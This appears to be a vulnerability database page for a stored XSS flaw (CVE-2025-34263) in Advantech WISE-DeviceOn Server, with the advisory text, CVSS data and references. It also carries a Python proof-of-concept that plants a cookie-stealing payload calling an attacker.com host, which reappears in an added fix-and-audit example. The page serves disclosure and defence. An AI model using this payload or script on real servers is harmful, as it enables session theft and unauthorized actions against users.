Security Vulnerability Report
CVE-2025-34263 CVSS 5.4 MEDIUM

CVE-2025-34263

Published: 2025-12-05 18:15:56
Last Modified: 2025-12-17 17:15:50

Description

Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/dashboards/menus endpoint. When an authenticated user adds or edits a dashboard entry, the label and path values are stored in plugin configuration data and later rendered in the dashboard UI without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected dashboard, potentially enabling session compromise and unauthorized actions as the victim.

CVSS Details

CVSS Score (v3.1, Primary)
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS Score (v4.0, Secondary)
5.1 MEDIUM
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

Note on the vector: PR:L means any authenticated account that can add or edit a dashboard entry is sufficient to plant the payload; UI:R and S:C reflect that the script runs only when another user loads the affected dashboard, in that user's browser context rather than the attacker's.

Configurations (Affected Products)

cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:* - VULNERABLE
Advantech WISE-DeviceOn Server < 5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-34263 Stored XSS PoC
# Target: Advantech WISE-DeviceOn Server < 5.4
# Endpoint: /rmm/v1/plugin-config/dashboards/menus
#
# Scope of this script: it authenticates and stores the payload. It cannot
# confirm execution; that happens only when another user loads the dashboard.
import requests

# Configuration
TARGET_URL = "http://target-server.com"
# The login endpoint and the username/password field names below are this
# PoC's assumptions; the advisory only documents the menus endpoint.
LOGIN_URL = f"{TARGET_URL}/rmm/v1/auth/login"
XSS_PAYLOAD = '<img src=x onerror="fetch(\'http://attacker.com/steal?cookie=\'+document.cookie)">'


def exploit_stored_xss():
    """Exploit stored XSS in dashboard menus endpoint"""
    # Step 1: Authenticate with a low-privilege account (PR:L in the vector)
    session = requests.Session()
    login_data = {
        "username": "low_priv_user",
        "password": "password123",
    }
    try:
        login_response = session.post(LOGIN_URL, json=login_data, timeout=10)
        if login_response.status_code != 200:
            print("[-] Authentication failed")
            return False
        print("[+] Authentication successful")

        # Step 2: Inject the payload into a dashboard menu entry. Both "label"
        # and "path" are rendered unescaped per the advisory; "label" is used here.
        menu_url = f"{TARGET_URL}/rmm/v1/plugin-config/dashboards/menus"
        malicious_menu = {
            "label": XSS_PAYLOAD,
            "path": "/dashboard/malicious",
            "icon": "chart",
            "order": 1,
        }
        inject_response = session.post(menu_url, json=malicious_menu, timeout=10)
        if inject_response.status_code in (200, 201):
            print("[+] XSS payload injected successfully")
            # The response body is not guaranteed to be JSON; don't crash on it.
            try:
                print(f"[+] Payload stored in menu ID: {inject_response.json().get('id')}")
            except ValueError:
                print("[*] Non-JSON response body; check the dashboard UI for the new entry")
            return True
        print(f"[-] Injection failed: {inject_response.status_code}")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2025-34263 Stored XSS Exploitation")
    print("=" * 40)
    exploit_stored_xss()
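The description above names the two halves of the bug: values accepted on write at the menus endpoint, and values rendered unescaped in the dashboard UI. The block below is an added example, not Advantech code and not part of the advisory or the PoC; it shows the vulnerable render pattern next to the two fixes a reviewer would ask for (encode on output, validate on input) and an audit helper for entries already stored before patching. Assumptions, stated here and in the code: a stored entry is a dict with "label" and "path" keys (the field names the PoC posts), a menu item renders as an `<li><a href=path>label</a></li>` fragment, and the path policy (in-app route only) is one I chose; the product's real template, storage layout and route rules are not documented on this page.

```python
"""
Added example (not Advantech code, not from the advisory): render-side and
write-side handling of dashboard menu entries, plus an audit over stored data.

Assumed: entries are dicts with "label" and "path" (the PoC's field names) and
render as <li><a href=path>label</a></li>. The real template is not on this page.
"""
import html
import re
from typing import Dict, List

# Constructed sample input: the payload the PoC stores in the "label" field.
XSS_LABEL = '<img src=x onerror="fetch(\'http://attacker.com/steal?cookie=\'+document.cookie)">'

LABEL_MAX_LEN = 128
# Assumed policy: a path is an in-app route only (no scheme, host or query).
SAFE_PATH = re.compile(r"^/[A-Za-z0-9_\-./]*$")
# Heuristic for auditing stored data. It is a detection aid, not the fix.
SUSPICIOUS = re.compile(r"[<>\"']|javascript:|data:|\bon\w+\s*=", re.IGNORECASE)


def render_menu_item_unsafe(entry: Dict[str, str]) -> str:
    """Mirrors the flaw in the advisory: values interpolated into HTML unescaped."""
    return f'<li><a href="{entry["path"]}">{entry["label"]}</a></li>'


def render_menu_item_safe(entry: Dict[str, str]) -> str:
    """Fix on the render side: HTML-encode both values. quote=True also encodes
    ' and ", so the href attribute context cannot be broken out of."""
    return (
        f'<li><a href="{html.escape(entry["path"], quote=True)}">'
        f'{html.escape(entry["label"], quote=True)}</a></li>'
    )


def validate_menu_entry(entry: Dict[str, str]) -> List[str]:
    """Fix on the write side (the POST/PUT handler): accept only a plain label
    and an in-app route. Returns a list of problems; an empty list means OK."""
    problems: List[str] = []
    label = entry.get("label")
    path = entry.get("path")
    if not isinstance(label, str) or not 0 < len(label) <= LABEL_MAX_LEN:
        problems.append(f"label: must be 1..{LABEL_MAX_LEN} characters")
    elif SUSPICIOUS.search(label):
        problems.append("label: HTML or script metacharacters are not allowed")
    # "//" passes the character class but would be a protocol-relative URL.
    if not isinstance(path, str) or not SAFE_PATH.match(path) or "//" in path:
        problems.append("path: must be an in-app route such as /dashboard/overview")
    return problems


def audit_stored_menus(entries: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run over a dump of stored menu entries (for example the endpoint's GET
    response) to find values that rendered as markup before the upgrade."""
    findings: List[Dict[str, object]] = []
    for index, entry in enumerate(entries):
        for field in ("label", "path"):
            value = str(entry.get(field, ""))
            if SUSPICIOUS.search(value):
                findings.append({"index": index, "field": field, "value": value})
    return findings


if __name__ == "__main__":
    evil = {"label": XSS_LABEL, "path": "/dashboard/malicious"}
    benign = {"label": "Overview", "path": "/dashboard/overview"}
    print("unsafe:", render_menu_item_unsafe(evil))
    print("safe:  ", render_menu_item_safe(evil))
    print("validate evil:  ", validate_menu_entry(evil))
    print("validate benign:", validate_menu_entry(benign))
    print("audit:", audit_stored_menus([benign, evil]))
```

Output encoding is the control that closes the bug; the input validation is defence in depth (an allowlist on `path` also blocks `javascript:` and protocol-relative targets that encoding alone leaves clickable), and the audit is what to run against existing plugin configuration after upgrading to 5.4, since the fix does not retroactively clean entries an attacker stored earlier.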

References

https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf (Advantech security advisory)
https://docs.deviceon.advantech.com/docs/resource/ (Product)
https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-dashboards-menus (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34263", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:56.133", "lastModified": "2025-12-17T17:15:49.663", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/dashboards/menus endpoint. When an authenticated user adds or edits a dashboard entry, the label and path values are stored in plugin configuration data and later rendered in the dashboard UI without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected dashboard, potentially enabling session compromise and unauthorized actions as the victim."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4", "matchCriteriaId": "BFB1F2C4-C260-473E-A6E1-EE7DFC3EF083"}]}]}], "references": [{"url": "https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf", "source": "[email protected]"}, {"url": "https://docs.deviceon.advantech.com/docs/resource/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-dashboards-menus", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}